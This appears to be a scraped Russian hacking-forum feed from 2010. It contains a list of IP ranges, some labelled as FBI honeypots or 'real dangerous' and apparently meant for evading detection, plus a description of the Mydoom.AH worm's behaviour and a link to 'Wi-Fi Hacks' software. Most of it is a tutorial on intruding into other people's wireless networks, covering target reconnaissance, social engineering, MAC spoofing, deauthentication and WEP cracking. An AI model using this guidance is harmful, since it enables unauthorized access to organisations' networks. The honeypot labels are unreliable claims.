Inc (NETBLK-TIAC-EFFNETT1) <br />207.60.66.64 - 207.60.66.79 Entropic Systems Inc (NETBLK-TIAC-ENTRO128-3) <br />207.60.66.80 - 207.60.66.95 Finley Properties (NETBLK-TIAC-FPDED135) <br />207.60.66.96 - 207.60.66.111 Nancy Plowman Associates (NETBLK-TIAC-NPAISDN) <br />207.60.66.112 - 207.60.66.127 Northeast Financial Strategies (NETBLK-TIAC-NFSISDN) <br />207.60.66.128 - 207.60.66.143 Textnology Corp (NETBLK-TIAC-TEXTC0RP) <br />207.60.66.144 - 207.60.66.159 Groton Neochem LLC (NETBLK-TIAC-NEOCHEM) <br />207.60.66.160 - 207.60.66.175 Tab Computers (NETBLK-TIAC-TCSI3) <br />207.60.66.176 - 207.60.66.191 Patrons Insurance (NETBLK-TIAC-PATRON99-2) <br />207.60.66.192 - 207.60.66.207 Chair City Web (NETBLK-TIAC-CHAIR56K) <br />207.60.66.208 - 207.60.66.223 Radex, Inc. (NETBLK-TIAC-RADEXINC ) <br />207.60.66.224 - 207.60.66.239 Robert Austein (NETBLK-TIAC-HACTRN) <br />207.60.66.240 - 207.60.66.255 Hologic Inc. (NETBLK-TIAC-HOLOGIC3) <br />207.60.71.64 - 207.60.71.127 K-Tech International Inc. (NETBLK-TIAC-KTECH) <br />207.60.71.128 - 207.60.71.191 Pan Communications (NETBLK-TIAC-PANCOM-2) <br />207.60.71.192 - 207.60.71.255 New England College of Finance (NETBLK-TIAC-NECF56K) <br />207.60.75.128 - 207.60.75.255 Absolve Technology (NETBLK-TIAC-ABSOLVE-2) <br />207.60.78.0 - 207.60.78.127 Extech (NETBLK-TIAC-EXTECH) <br />207.60.78.128 - 207.60.78.255 The Insight Group (NETBLK-TIAC-MFIA) <br />207.60.83.0 - 207.60.83.255 JLM Technologies (NETBLK-TIAC-JLMISDN) <br />207.60.84.0 - 207.60.84.255 Strategic Solutions (NETBLK-TIAC-STRATSOL-2) <br />207.60.94.0 - 207.60.94.15 McWorks (NETBLK-TIAC-MCWORKSS) <br />207.60.94.32 - 207.60.94.47 Rooney RealEstate (NETBLK-TIAC-ROONEY56) <br />207.60.94.48 - 207.60.94.63 Joseph Limo Service (NETBLK-TIAC-JOLIMO56) <br />207.60.94.64 - 207.60.94.79 The Portico Group (NETBLK-TIAC-PORT56K) <br />207.60.94.80 - 207.60.94.95 Event Travel Management Inc (NETBLK-TIAC-EVENT384) <br />207.60.94.96 - 207.60.94.111 Intellitech International (NETBLK-TIAC-IIDED99) <br />207.60.94.128 - 207.60.94.143 Orion Partners (NETBLK-TIAC-ORION56) <br />207.60.94.144 - 207.60.94.159 Rainbow Software Solution (NETBLK-TIAC-RAIN99) <br />207.60.94.160 - 207.60.94.175 Grason Stadler Inc (NETBLK-TIAC-GRASON56) <br />207.60.94.192 - 207.60.94.207 Donnegan System (NETBLK-TIAC-DYST384-2) <br />207.60.95.1 - 207.60.95.255 The Iprax Corp. (NETBLK-TIAC-IPRAX56K) <br />207.60.102.0 - 207.60.102.63 Coporate IT (NETBLK-TIAC-CIT) <br />207.60.102.64 - 207.60.102.127 Putnam Technologies (NETBLK-TIAC-PUTTECH) <br />207.60.102.128 - 207.60.102.191 Sycamore Networks, Inc (NETBLK-TIAC-SYCAISDN) <br />207.60.102.192 - 207.60.102.255 Bostek (NETBLK-TIAC-BOSTEK) <br />207.60.103.128 - 207.60.103.255 Louis Berger and Associates (NETBLK-TIAC-BERGISDN) <br />207.60.104.128 - 207.60.104.191 Hanson Data Systems (NETBLK-TIAC-HHANSON) <br />207.60.106.128 - 207.60.106.255 Giganet Inc. (NETBLK-TIAC-GIGANET-3) <br />207.60.107.0 - 207.60.107.255 Roll Systems (NETBLK-TIAC-ROLLISDN) <br />207.60.108.8 - 207.60.108.15 InternetQA (NETBLK-TIAC-EBENNETT) <br />207.60.111.0 - 207.60.111.31 Reading Cooperative Bank (NETBLK-TIAC-READ56K) <br />207.60.111.32 - 207.60.111.63 Edco collaborative (NETBLK-TIAC-EDCOT1) <br />207.60.111.64 - 207.60.111.95 DTC Communications Inc (NETBLK-TIAC-DTCCOM2) <br />207.60.111.96 - 207.60.111.127 Mike Line (NETBLK-TIAC-MLINE ) <br />207.60.111.128 - 207.60.111.159 The Steppingstone Foundation (NETBLK-TIAC-STEP56) <br />207.60.111.160 - 207.60.111.191 Caton Connector (NETBLK-TIAC-CATON118K) <br />207.60.111.192 - 207.60.111.223 Refron, Inc (NETBLK-TIAC-REFRON1 ) <br />207.60.111.224 - 207.60.111.255 Dolabany Comm Group (NETBLK-TIAC-DCGDED99) </p> <p>207.60.112.0 - 207.60.112.255 <br />207.60.116.0 - 207.60.116.255 <br />207.60.122.16 - 207.60.122.23 <br />207.60.122.24 - 207.60.122.31 <br />207.60.122.32 - 207.60.122.39 <br />207.60.122.40 - 207.60.122.47 <br />207.60.122.48 - 207.60.122.55 <br />207.60.122.56 - 207.60.122.63 <br />207.60.122.64 - 207.60.122.71 <br />207.60.122.72 - 207.60.122.79 <br />207.60.122.80 - 207.60.122.87 <br />207.60.122.88 - 207.60.122.95 <br />207.60.122.96 - 207.60.122.103 <br />207.60.122.104 - 207.60.122.111 <br />207.60.127.0 <br />207.60.128.0 - 207.60.128.255 <br />207.60.129.0 - 207.60.129.255 <br />207.60.129.64 - 207.60.129.127 <br />207.60.129.128 - 207.60.129.191 <br />207.60.129.192 - 207.60.129.255 <br />207.205. * Earthlink, USA <br />207.226.*.* : Mobilcom <br />208.171. [Computer Lynx, USA <br />209.35.* : (FBI's honeypot) <br />212.28.*.* : Agri (Schweiz) <br />212.35.*.* : DiaX (Schweiz) <br />212.46. [Chello, Netherlands <br />212.56.107.22 : (FBI's honeypot) <br />212.61. * IAEhv, Netherlands <br />212.64 [Casema, Netherlands <br />212.81.*.* : Mobilcom <br />212.83. [Chello, Netherlands <br />212.92. [Chello, Netherlands <br />212.120. * @Home, Netherlands <br />212.123. [Pandora, Belgium] <br />212.127. [Sonera, Netherlands <br />212.136.74.* : UUNet <br />212.136.77.* : UUNet <br />212.136.128.*:UUNet <br />212.136.129.*:UUNet <br />212.142. [Chello, Netherlands <br />212.153.255.*:UUNet <br />212.159.0.2 : (FBI's honeypot) <br />212.159.0.2 : (FBI's honeypot) <br />212.159.1.1 : (FBI's honeypot) <br />212.159.1.4 : (FBI's honeypot) <br />212.159.1.5 : (FBI's honeypot) <br />212.159.33.56 : (FBI's honeypot) <br />212.159.40.211 : (FBI's honeypot) <br />212.159.41.173 : (FBI's honeypot) <br />212.159.1.1 <br />212.159.1.4 <br />212.159.1.5 </p> <p>212.159.0.2 <br />212.159.1.1 <br />212.159.1.4 <br />212.159.1.5 <br />212.159.33.56 <br />212.159.40.211 <br />212.159.41.173 <br />212.159.0.2 <br />212.159.1.1 <br />212.159.1.4 <br />212.159.1.5 <br />212.172.*.* : Nacamar <br />212.177.114.*:UUNet <br />212.181.*.* : 1 &amp; 1 <br />212.186. [Chello, Austria] <br />212.187. [Chello, Netherlands <br />212.202.*.* : Germany Net <br />212.204 [@Home, Netherlands <br />212.254.*.* : Sunrise (Schweiz) <br />213.2. ? <br />213.3. * Bluewin, Germany <br />213.4. * Telefonica, Spain <br />213.5. * Altec, Greece <br />213.6. * PPPool, Germany <br />213.7. ? <br />213.8. ? <br />213.9. * Webtris Online Games, Germany <br />213.10. * Planet Internet, Netherlands <br />213.11. ? <br />213.12. ? <br />213.13. ? <br />213.14. ? <br />213.15. ? <br />213.16. * L'Outremere, France <br />213.17. * Casema, Netherlands <br />213.18. ? <br />213.19. * World Online, France <br />213.20. ? <br />213.21. ? <br />213.22. ? <br />213.23. * Mannesman Arcor, Germany <br />213.24. * IZHCom, Russia <br />213.25. ? <br />213.26. ? <br />213.27. ? <br />213.28. ? <br />213.29. ? <br />213.30. * Netc, Spain <br />213.31. ? <br />213.32. ? <br />213.33. * Enter Telekom, Austria <br />213.34. * Kennisnet, Netherlands <br />213.35. * 24Hours, Netherlands <br />213.36. * LibertySurf, France <br />213.37. ? <br />213.38. * Internet Network Services, UK <br />213.39. ? <br />213.40. ? <br />213.41. * Colt, France <br />213.42. * Emirates Telecom Corporation <br />213.43. ? <br />213.44. * Club Internet, France <br />213.45. ? <br />213.46. [Chello, Netherlands <br />213.47. ? <br />213.48. ? <br />213.49. ? <br />213.50. * Sonera, Finland <br />213.51. [@Home, Netherlands <br />213.52. * OneNet S.L., Spain <br />213.53. * UUNET, Netherlands <br />213.54. * TiscaliNet, Germany <br />213.55. ? <br />213.56. * D'Olйane, France <br />213.57. ? <br />213.58. ? <br />213.59. * RTComm.ru <br />213.60. ? <br />213.61. * Colt, Germany <br />213.62. ? <br />213.63. * JazzNet, Protugal <br />213.64. [Telia, Sweden] <br />213.65. ? <br />213.66. ? <br />213.67. ? <br />213.68. ? <br />213.69. ? <br />213.70. ? <br />213.71. ? <br />213.72. ? <br />213.73. ? <br />213.74. ? <br />213.75. * Planet Internet, Netherlands <br />213.76. ? <br />213.77. ? <br />213.78. ? <br />213.79. ? <br />213.80. ? <br />213.81. ? <br />213.82. ? <br />213.83. ? <br />213.84. * XS4ALL, Netherlands <br />213.85. ? <br />213.86. ? <br />213.87. ? <br />213.88. ? <br />213.89. ? <br />213.90. * Netway Communications, Austria <br />213.91. * France Teaser <br />213.92. ? <br />213.93. * Chello, Netherlands <br />213.94. ? <br />213.95. ? <br />213.96. ? <br />213.97. ? <br />213.98. ? <br />213.99. ? <br />213.100. * The Swedish IP Network <br />213.101. ? <br />213.102. ? <br />213.103. ? <br />213.104. ? <br />213.105. * NTL, UK <br />213.106. ? <br />213.107. ? <br />213.108. * Business Online, UK <br />213.109. ? <br />213.110. ? <br />213.111. ? <br />213.112. ? <br />213.113. ? <br />213.114. ? <br />213.115. ? <br />213.116. * UUNET, Denmark <br />213.117. ? <br />213.118. ? <br />213.119. ? <br />213.120. * BTClick, UK <br />213.121. ? <br />213.122. ? <br />213.123. * OnMail, UK <br />213.124. ? <br />213.125. ? <br />213.126. ? <br />213.127. ? <br />213.128. ? <br />213.129. * UUNET, Denmark <br />213.130. * Farlep Internet, Ukraine <br />213.131. * Moscow State University, Russia <br />213.132. ? <br />213.133. * Spinn, Denmark <br />213.134. * Nextra, Hungary <br />213.135. * Intersaar, Germany <br />213.136. ? <br />213.137. ? <br />213.138. ? <br />213.139. * Easynet, Spain <br />213.140. ? <br />213.141. * JazzNet, Portugal <br />213.142. * RSL COM, Spain <br />213.143. ? <br />213.144. * TelemaX, Germany <br />213.145. ? <br />213.146. * Werft 22, Germany <br />213.147. * Sybcom, Germany <br />213.148. * NOC Communication InterNet, Russia <br />213.149. * Strona Glуwna, Poland <br />213.150. * IT Austria <br />213.151. ? <br />213.152. * INTERSAT S.A., Greece <br />213.153. ? <br />213.154. * On:Line Finance, UK <br />213.155. ? <br />213.156. * Pine Internet, Netherlands <br />213.157. * HEAG MediaNet, Germany <br />213.158. * St. Petersburg Web, Russia <br />213.159. ? <br />213.160. * Compoint, Germany <br />213.161. * KKS Online, Slovenia <br />213.162. ? <br />213.163. * VIVENDI Telecom, Hungary <br />213.164. * Colt, Austria <br />213.165. ? <br />213.166. * Band-X-Routed, UK <br />213.167. ? <br />213.168. * EESTI Telefon, Estonia <br />213.169. * Cabinet IT, Finland <br />213.170. * Knowtion.net <br />213.171. ? <br />213.172. * ComSet, Russia <br />213.173. * Yendor.net <br />213.174. * Bulgarian Industrial Association <br />213.175. ? <br />213.176. ? <br />213.177. ? <br />213.178. * Bressem, Germany <br />213.179. ? <br />213.180. * Delfi, Estonia <br />213.181. ? <br />213.182. * SpeedCom, USA <br />213.183. * Netplace Telematic, Germany <br />213.184. * Warmia and Mazury University, Poland <br />213.185. ? <br />213.186. ? <br />213.187. * Eastlink, Germany <br />213.188. * WEBONLINE, Norway <br />213.189. ? <br />213.190. ? <br />213.191. * trans-it AG, Germany <br />213.192. ? <br />213.193. * Multimania, France <br />213.194. * Telfort, Netherlands <br />213.195. ? <br />213.196. * CyberComm Internet BV, Netherlands <br />213.197. [Concepts ICT, Netherlands <br />213.198. ? <br />213.199. * Telexis, Italy <br />213.200. * Basel Kommunikation, Germany <br />213.201. ? <br />213.202. ? <br />213.203. ? <br />213.204. * UNO Communications, Italy <br />213.205. * WorldOnline, Italy <br />213.206. * Intensive Networks, UK <br />213.207. * Bevelander, Netherlands <br />213.208. ? <br />213.209. ? <br />213.210. ? <br />213.211. ? <br />213.212. ? <br />213.213. * Infinito, Italy <br />213.214. ? <br />213.215. ? <br />213.216. * Vistec, Germany <br />213.217. * Augsburg, Germany <br />213.218. ? <br />213.219. ? <br />213.220. ? <br />213.221. ? <br />213.222. ? <br />213.223. ? <br />213.224. [Pandora, Belgium] <br />213.225. * Eti.at <br />213.226. ? <br />213.227. * supercable Andalucia, spain <br />213.228. * Louis, Motorradseiten, Germany <br />213.229. ? <br />213.230. ? <br />213.231. ? <br />213.232. * ADA-NET, Turkey <br />213.233. ? <br />213.234. * CATalunya Neutral Internet eXchange (CATNIX), Spain <br />213.235. ? <br />213.236. ? <br />213.237. * WorldOnline, Denmark <br />213.238. ? <br />213.239. ? <br />213.240. * EUnet, Yugoslavia <br />213.241. * Polbox, Poland <br />213.242. ? <br />213.243. ? <br />213.244. ? </p> <p>216.25.* : REAL DANGEROUS <br />216.247.* : REAL DANGEROUS <br />216.248.*.* <br />217.6.*.* :</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:20:08 +0300 https://kasper.7li.ru/viewtopic.php?pid=25#p25 https://kasper.7li.ru/viewtopic.php?pid=24#p24 <p>незачто=)))</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:16:43 +0300 https://kasper.7li.ru/viewtopic.php?pid=24#p24 https://kasper.7li.ru/viewtopic.php?pid=22#p22 <p>W32.Mydoom.AH@mm - это червь массовой рассылки, который эксплуатирует уязвимость удаленного переполнения буфера в Microsoft Internet Explorer в тэге IFRAME. Распространяется червь, рассылая себя по email адресам, которые найдет на зараженном компьютере.</p> <p>При запуске W32.Mydoom.AH@mm выполняет следующие действия:</p> <p>1. Создает файл %System%\[random name]32.exe.</p> <p>2. Добавляет значение:</p> <p>&quot;Reactor5&quot; = &quot;%System%\[random name]32.exe&quot; </p> <p>в ключ реестра:</p> <p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run<br />HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run </p> <p>3. Может создать следующие ключи реестра:</p> <p>HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\<br />Explorer\ComExplore<br />HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\<br />Explorer\ComExplore\Version<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\<br />Explorer\ComExplore<br />HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\<br />Explorer\ComExplore\Version </p> <p>4. Удаляет следующие значения:</p> <p># center<br /># reactor<br /># Rhino<br /># Reactor3<br /># Reactor4 </p> <p>из ключа реестра:</p> <p>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run </p> <p>5. Пытается внедрить свой код в качестве потока в любой процесс с window class name &quot;Shell_TrayWnd&quot; или в любой запущенный высокоприоритетный процесс. Если это червю удалось, то он продолжает выполняться внутри зараженного процесса. Все действия, описываемые в следующих пунктах выполняет зараженный процесс, а червь становится невидимым в списке процессов в Windows Task Manager. Если червю не удалось внедрить свой код, то он продолжает выполнятьтся как собственный процесс.</p> <p>6. Собирает email адреса из Windows address book и из файлов с расширениями:</p> <p># .txt<br /># .htmb<br /># .shtl<br /># .phpq<br /># .aspd<br /># .dbxn<br /># .tbbg<br /># .adbh<br /># .pl<br /># .wab </p> <p>7. Использует собственный SMTP механизм для того, чтобы разослать себя по найденным email адресам.</p> <p>8. Открывает 1639 TCP порт для команд.</p> <p>9. Пытается соединиться со следующими IRC серверами по 6667 TCP порту:</p> <p># broadway.ny.us.dal.net<br /># brussels.be.eu.undernet.org<br /># caen.fr.eu.undernet.org<br /># ced.dal.net<br /># coins.dal.net<br /># diemen.nl.eu.undernet.org<br /># flanders.be.eu.undernet.org<br /># graz.at.eu.undernet.org<br /># london.uk.eu.undernet.org<br /># los-angeles.ca.us.undernet.org<br /># lulea.se.eu.undernet.org<br /># ozbytes.dal.net<br /># qis.md.us.dal.net<br /># vancouver.dal.net<br /># viking.dal.net<br /># washington.dc.us.undernet.org </p> <p>10. Прекращает работу 16-го декабря 2004 года.</p> <p>&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 17:41:03 +0300 https://kasper.7li.ru/viewtopic.php?pid=22#p22 https://kasper.7li.ru/viewtopic.php?pid=15#p15 <div class="quote-box answer-box"><cite>irenica написал(а):</cite><blockquote><p>Можно установить скрипт и при заходу на страницу с приватностью будут ссылки на всё это.</p></blockquote></div><p>И так можно!</p> mybb@mybb.ru (Kasper) Tue, 05 Jan 2010 08:49:19 +0300 https://kasper.7li.ru/viewtopic.php?pid=15#p15 https://kasper.7li.ru/viewtopic.php?pid=13#p13 <p><strong>Взлом Wi-Fi (Wi-fi Hacks) 2009 Soft</strong></p> <p><a href="http://letitbit.net/download/3495.39acf105e0325bbf5ee6fa65f/Wifi.Hacks.2009.rar.html" rel="nofollow" target="_blank">Скачать</a></p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 23:29:21 +0300 https://kasper.7li.ru/viewtopic.php?pid=13#p13 https://kasper.7li.ru/viewtopic.php?pid=11#p11 <p>/* Вступление */</p> <p>Участники Defcon 2002 провели небольшое исследование (вообще то это больше походило на спортивное соревнование) на предмет проникновения в беспроводные сети. Изучив более 500 точек доступа в округе, они выявили интересную статистику: только около 30% беспроводных сетей защищены протоколом WEP; в каждой пятой сетке значение ESSID было выставлено «по умолчанию»; а еще было выявлено, что 20% беспроводных сетей абсолютно никак не защищены от доступа извне. На следующем Defcon 2003 эта статистика вновь подтвердилась (исследовались беспроводные сети Лас-Вегаса и Лос-Анджелеса). Такое положение дел характерно не только для США, но и для Европы, в том числе и России. Эксперты в области безопасности беспроводных сетей сходятся во мнении, что только около десяти процентов беспроводных сетей защищены чем-то большим, чем протокол WEP и фильтрацией MAC-адресов.</p> <p>/* Готовимся к атаке */</p> <p>Интересная статистика, не правда ли? Получается, что, имея ноутбук, кое-какие программы и немного знаний, можно проникнуть в 90% сетей 802.11. А имея более глубокие знания по беспроводным сетям и обладая некоторыми хакерскими навыками (социальной инженерией, например), процент удачных проникновений стремится к 100. Хочу поделиться с тобой некоторой информацией по этому поводу.</p> <p>Что нужно для WiFi-хакинга:<br />- ноутбук;<br />- WiFi-карта с набором микросхем Prism2 (в принципе, можно работать и с другими, например, Hermes, но лучше все же Prism, т.к. под такие карты пишется большинство необходимого нам софта) и с возможностью подключения внешней антенны;<br />- антенна, а лучше две: всенаправленная и узконаправленная;<br />- автомобиль.<br />Ну, это в идеале, но может пройти и такой вариант: ноутбук со встроенным модулем wifi, две ноги (еще один вариант – домашний комп + позаимствованная у друга карта + присоединенная к ней наспех сделанная своими руками направленная антенна, которую с балкона нацеливаешь на офис какой-нибудь находящийся неподалеку фирмы ; ). Не стоит также недооценивать возможности КПК, поэтому если у тебя есть наладонник с wifi-модулем (желательно iPac или Zaurus, работающие по никсами), то он может весьма пригодится.</p> <p>Какую ось выбрать для этого дела? Лучше если не винду. На то есть несколько причин, но самая главная – это отсутствие нормального софта под нее. Под словом «нормального» я понимаю качественного и бесплатного. Больше всего нужных нам прог написано под линукс, но так же вполне можно найти неплохой софт под фряху. Знаю, многие сейчас могут мне возразить, утверждая, что под винду есть проги, бесплатные, которыми можно легко и непринужденно взламывать wifi-сети, имея в виду NetStumbler, Aircrack для взлома WEP. С их помощью можно взломать те самые 70% сетей, а никсы – это трата времени и т.п. и пр. Да, конечно, софтом по винду пользоваться легко и просто, но ты должен знать, что возможности того же NetStumblera весьма ограничены по сравнению, например, с Kismet под линукс, нормальный админ легко сможет защитить сеть от Нетстамблера. Для проникновения в хорошо защищенную сеть винда уж точно не годится.</p> <p>/* Выбор цели */</p> <p>О том, как отыскивать сети, уже написано много раз, поэтому не буду здесь все это повторять. Вардрайвишь по центру города в поисках беззащитной, находишь и взламываешь ее, и вот тебе доступен канал в инет или еще что-нибудь интересненькое. В случае чего быстро сваливаешь…</p> <p>Но возможен и другой вариант: тебе нужно проникнуть в беспроводную сеть определенной организации. Ты не знаешь, насколько хорошо она защищена, с чего же начать? Первое, что необходимо предпринять - провести интернет-разведку. Нужно узнать как можно больше о том кто занимается вопросами ИТ в организации, как они этим занимаются, т.е. накопить как можно больше информации о своем противнике. Зачем это может пригодиться? Во-первых, можно нарыть кучу полезной для себя информации, касающейся используемых фирмой технологий защиты. Во-вторых, знание имен должностных лиц компании может пригодиться при использовании социнженерии.</p> <p>Поищи так же информацию на вардрайверских сайтах об интересующей тебя сетке.<br />Далее следует провести осмотр местности. Нужно выявить наиболее удобное место для атаки. Бывает так, что сеть никак не защищена, но присоединится к ней можно только находясь в непосредственной близости от нее. В этом случае тебе понадобится мощная остронаправленная антенна. Можно также пойти на более экстремальные действия: под каким-нибудь предлогом проникнуть внутрь здания и совершить взлом «изнутри», но в этом случае нужно сделать все «по-тихому», т.к. возможно наличие системы IDS.</p> <p>/* Изучаем трафик */</p> <p>Рассмотрим несколько прог для обнаружения сетей и анализа их трафика. Существует два способа обнаружения беспроводных сетей: метод активного сканирования и метод пассивного сканирования. Активное сканирование представляет собой посылку пробного запроса. В фрейме-ответе содержится такая информация как ESSID, канал передачи данных, информация о включенном или выключенном протоколе WEP, уровень сигнала, скорость передачи данных. Именно так действуют NetStumbler и MiniStumbler. Проблема в том, что админ легко может настроить точку доступа так, что она не будет отвечать на подобные запросы, таким образом, она станет невидимой для NetStumbler’а. Кроме того, сигнатурные IDS выявляют сканирование Нетстамблером, так что ты можешь привлечь к себе внимание используя его. Еще один трюк, который может предпринять админ – это посылка поддельного фрейма-ответа с заведомо несуществующими данными на твой фрейм-запрос, чтобы ввести тебя в заблуждение. Это можно реализовать, например, с помощью проги File2Air написанной Джошуа Райтом (Joshua Wright). Еще один минус активного сканирования – это высокий расход заряда аккумулятора.</p> <p>Пассивное сканирование использует режим мониторинга wifi-карты. Оно состоит в перехвате трафика проходящего по всем каналам. Т.е. это сниффинг. Лучшим инструментом для пассивного сканирования, по моему мнению, является Kismet, созданная Майком Киршоу (Mike Kershaw) . По сути, эта прога предназначена для анализа трафика wifi и создания систем IDS. Kismet поддерживает все карты, умеющие работать в режиме rfmon, ее можно поставить на Linux, в том числе на дистрибутивы для КПК, FreeBSD и OpenBSD, MacOSX (и даже на винду, с помощью Cygwin’а). Найти последнюю версию Kismet можно на <a href="http://www.kismetwireless.net" rel="nofollow" target="_blank">http://www.kismetwireless.net</a> . Прежде чем собирать Kismet настоятельно рекомендую тебе обзавестись (если, вдруг, у тебя его нет) Ethernal’ом, который пригодится для изучения дампов, сформированных Kismet. Если у тебя есть GPS-приемник, то тогда неплохо установить еще и GpsDrive, интегрирующий с Kismet c ним. Компиляция Kismet весьма проста и не должна вызвать каких-либо сложностей. Если будет что-то непонятно, то прочитай README, там все очень подробно расписано.<br />Для настройки Kismet под наши нужды открываем /usr/local/etc/kismet.conf. Здесь нужно сделать несколько вещей:<br />- отключить фильтрацию MAC-адресов;<br />- разрешить устанавливать соединения с IP 127.0.0.1;<br />- выставить maxclient равным 1;<br />- установить в значение source источник перехватываемых данных;<br />- настроить интервал между операциями записи;<br />- параметры noiselog и beaconlog выставь в значение false – сэкономишь место на диске;<br />- если необходимо, настрой GPS;<br />- не забудь наделить правами запуска Kismet пользователя, под которым ты обычно работаешь, если конечно, не собираешься работать под рутом.<br />Остальные настройки не так важны для нас.</p> <p>Итак, какими полезными умениями обладает эта прога. Во-первых, она выводит информацию о том, что точка доступа имеет конфигурацию «по умолчанию», вылавливает пробные запросы «затерявшихся» хостов, а так же пробные запросы Нетстамблера, может на лету расшифровывать пакеты, если задать правильный WEP, а в случае обнаружения IP-адресов, определяет, какой протокол применяется для их распознания (ARP, TCP, UDP или DHCP). Во-вторых, она генерирует дампы в формате pcap, что позволяет просматривать их затем с помощью анализатора сетевых протоколов Ethernal.</p> <p>Существует еще множество программ, умеющих обнаруживать беспроводные сети стандарта 802.11, среди них я бы выделил такие инструменты как Airfart, консольная тулза WifiScanner тоже, на мой взгляд, весьма неплоха. Они обе работают только на картах с набором микросхем Prism и нуждаются в дровах linux-wlan-ng.</p> <p>/* Обходим барьеры */</p> <p>Простейшая защита сети wifi от незаконного вторжения может осуществляться с помощью таких методов как: скрытие ESSID сети от посторонних глаз, фильтрация MAC-адресов и фильтрация протоколов. Давай посмотрим, что мы можем противопоставить этому.</p> <p>Если сеть закрытая, то ее ESSID (Extended Service Set ID – служебный идентификатор сети) не фигурирует в циркулирующих в ней фреймах. Не зная ESSID сети, взломщик не может присоединиться к ней. На самом деле ESSID присутствует в запросах на повторную аутентификацию и повторное присоединение, а значит можно узнать ESSID, послав поддельный фрейм деаутентификации хосту от MAC-адреса точки доступа. Затем нужно перехватить фрейм посылаемый хостом, содержащий интересующий нас ESSID. Реализовать это легко можно с помощью утилиты essid_jack содержащейся в комплекте программ AirJack. В своей статье о DoS-атаках в сетях WiFi я уже писал об AirJack’е, поэтому не буду заострять здесь на нем внимания.</p> <p>Возможен такой вариант событий, когда точка доступа одна и нет в настоящий момент взаимодействующих с ней хостов. В этом случае остается опробовать вариант ESSID характерный для настроек «по умолчанию» производителя данной точки доступа. Некоторые админы, закрыв сеть, даже не подумывают изменить их значения.</p> <p>Фильтрация MAC-адресов вообще обходится проще простого. Нужно изучить трафик на предмет встречающихся MAC-адресов, и когда какой-нибудь хост отсоединится от сети, можно присоединится к ней, установив себе такой же MAC. Если ждать отсоединения хоста не хочется, то можно выкинуть этот хост из сети задосив его ; ) (но тогда появляется риск быть засеченным системой IDS).</p> <p>Фильтрация протоколов применяется намного реже, чем фильтрация MAC-адресов и скрытие ESSID, так как это не всегда удобно для работы в сети и не во всех точках доступа можно нормально использовать ее. Если ты столкнулся с такой сетью, то могу тебе посоветовать испытать на предмет наличия уязвимостей разрешенные в сети протоколы. Обычно такими протоколами являются SSH и HTTPS. Если используются устаревшие версии протоколов, то наверняка в них есть дыры, которые можно проэксплуатировать. Кроме того, весьма полезной может оказаться техника атак «Man-in-the-Middle».</p> <p>/* Уделаем WEP */<br />Про взлом протокола WEP написано уже столько, что создается ощущение, что это чуть ли не единственная и самая главная защита беспроводных сетей от вторжений, и что на этом ограничиваются средства безопасности сетей wifi. Что ж, судя по статистике это верно в каждом третьем случае.</p> <p>Выделяют несколько видов атак на WEP:<br />- атака методом полного перебора – возможен подбор только 40-битного ключа (в WEP применяются 64-х и 128-ми 256-ти 512-битные ключи, но так как первые 24 бита занимает так называемый вектор инициализации (IV), передающийся в открытом виде, то можно говорить, что длина ключей составляет 40 и 104 и т.д. бита), но такая атака может занять довольно продолжительное время, а потому неэффективна;<br />- атака по словарю – может осуществляться против одного перехваченного пакета, она реализована в проге Wepattack; в отличие от атаки методом полного перебора, возможна расшифровка 104-битного ключа;<br />- атаки методом полного перебора с использованием оптимизирующих алгоритмов – могут сократить время полного перебора 40-битного ключа с нескольких недель до половины минуты, но это при удачном для хакера раскладе, а в целом эти атаки так же неэффективны (64-битное шифрование встречается очень редко);<br />- атака FMS – имеет очень интересный механизм, позволяющий при наличии 6-8 млн. пакетов определить значение WEP;<br />- оптимизированные атаки FMS – например, хакер H1kari сумел оптимизировать алгоритм FMS так, что количество необходимых пакетов сократилось до 500 тысяч;<br />- другие атаки – сюда можно включить различные вспомогательные атаки, например, внедрение трафика для ускорения процесса сбора необходимого количества пакетов.<br />В реальности количество необходимых для взлома WEP перехваченных фреймах может колебаться в весьма широких пределах, но обычно это 1,5-2 млн. пакетов.</p> <p>На сегодняшний день проги, взламывающие WEP используют, в основном, так называемую атаку по методу Флуера-Мантина-Шамира или атаку FMS, разработанную в 2001 году Скоттом Флуером (Scott Fluhrer), Ициком Мантином (Itsik Mantin) и Ади Шамиром (Adi Shamir), плюс различные оптимизирующие эту атаку алгоритмы. Одной из лучших программ для взлома WEP является на сегодня Aircrack. Помимо атаки FMS, она использует также несколько новых видов атак, разработанных хакером KoreK. Для взлома WEP нужно скормить Aircrack’у файл с перехваченными пакетами в формате pcap.</p> <p>В сетях с низким трафиком процесс сбора пакетов может весьма затянуться. В документации к Aircrack’у подробно описан способ решения этой проблемы с помощью дополнительной карты, посылающей уже перехваченные фреймы снова «в эфир», предварительно вставляя в них ARP-запросы (хитро задумано, не правда ли?), что позволит получить дополнительный трафик в виде ответов на них. На мой взгляд, это не совсем удобный вариант из-за того, что не у всех есть две карточки wifi. Альтернативой может послужить использование проги File2Air, умеющей посылать данные в режиме мониторинга.</p> <p>В принципе, есть еще один способ узнать WEP: если сеть подключена к Интернету, то, проникнув через него на одну из машин, можно попытаться определить WEP-ключ сетевого интерфейса wifi. К примеру, в Linux-системе он хранится в файле /etc/pcmcia/wireless.opts.</p> <p>/* Что дальше? */</p> <p>А дальше обычно ничего. Защитный потенциал большинства беспроводных сетей на этом и заканчивается. Но бывает, что нет. Сеть может функционировать на базе стандарта 802.1x, может быть развернута виртуальная частная сеть (VPN). Здесь успех проникновения будет зависеть от множества различных факторов. Универсального алгоритма дальнейших действий попросту нет.</p> 